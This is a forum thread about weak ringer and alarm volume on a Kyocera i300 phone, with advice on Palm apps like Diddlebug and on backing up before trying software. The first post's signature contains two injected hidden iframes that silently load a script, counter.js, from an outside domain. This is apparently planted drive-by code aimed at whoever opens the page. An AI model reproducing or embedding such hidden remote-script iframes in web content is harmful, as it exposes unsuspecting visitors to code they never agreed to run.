+ Reply to Thread

Unhappy Alarm, Ringer volume

Well, after one week of use, I'm very happy with the i300. However, I'm a *little* disappointed in the loudness levels for ringer and alarms. I tried to adjust the alarm level, but noticed no audible difference between low, med, high. Also miss a number of calls due to low loudness level of even the highest ringer setting. Is there a fix for this?

Also, in my previous PDA life (wireless Palm VII), used diddlebug, peoplefinder, mapquest and Gatefinder (Americal Airlines gates by flight). I saw a post for diddlebug (My i300 is version UJ12), but not sure if it works with my svr. I also notice many posts describing lockups, reloads, etc. when trying some of the software out there. Is there a safe way to do this, or is it always trial & error? Can I get the above software all from a singel site?

Thanks in advance,<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Dr. Dan

I've been using Diddlebug v2.50beta12 for some weeks now without a single error. Of course, as with al beta software, there may be some surprises that arise. Search for the beta at http://sourceforge.net.

As far as other apps, I frequent palm.tucows.com and www.palmgear.com to search for other useful tools.

Lastly, as far as how you go about trying them, trial and error is really the only way. Be sure to do a complete synch/ backup before, and if you have to do a complete reset, be prepared to lose your speed-dials and voice dials (those aren't backed up/ synch'd).
    Cliff

My phone has locked up a few times and I've only run a cold reset once and that was just to do it.

Administrator

Arrow

yes back up . backup, backup... thats the only was to be safe~! use desktop 4.0.1 if you are not already.. it will back up those apps, unike 3.1 which wont.

Originally posted by Marctronixx
    it will back up those apps, unike 3.1 which wont.
    Which apps? do ya mean voice/ speed dials.....?..?.?.?.....?
    Cliff

Administrator

Arrow

yerah,

3.1 wont backup anything you have installed, but 4.0.1 will except the voice/speed dial #'s.. thats when the voice command from sprint comes in handy, and which i exclusively use.